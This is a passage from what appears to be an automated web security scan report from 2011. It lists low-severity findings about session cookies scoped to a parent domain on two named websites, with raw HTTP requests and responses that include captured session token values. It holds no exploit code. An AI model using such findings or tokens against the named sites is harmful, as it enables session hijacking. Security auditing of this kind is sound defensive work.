Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:49 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=t5s0kmeibbbtts6cq9hfdffs02; expires=Tue, 26-Apr-2011 23:55:49 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.5. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Vulnerability-Scan-Services/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Vulnerability-Scan-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:47 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=bk4mm1ag6ue392h3jsauk88r25; expires=Tue, 26-Apr-2011 23:55:47 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 23560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.6. http://www.clone-systems.com/ecommerce/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:25:33 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=o07bfks454r08e1ev5t4uf6is4; expires=Wed, 27-Apr-2011 00:25:33 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Tue, 03 May 2011 00:25:33 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 190
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'http://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           

14.7. http://www.hugthecloud.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:27 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT
Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT
X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe
X-XN-XNHTML: false
Date: Tue, 26 Apr 2011 12:39:16 GMT
Date: Tue, 26 Apr 2011 12:39:16 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/html; charset=utf-8
Server: Ning HTTP Server 2.0
Content-Length: 54058

<!DOCTYPE html>
<html lang="en">
<head data-layout-view="default">
<script>(function(){var d={date:8,app:"s",host:"s",ip:4,ua:"s",user:"s",url:"s",html:4,css:4,render:4,js:4,nlr:4,nlr_eval
...[SNIP]...

14.8. http://www.hugthecloud.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path: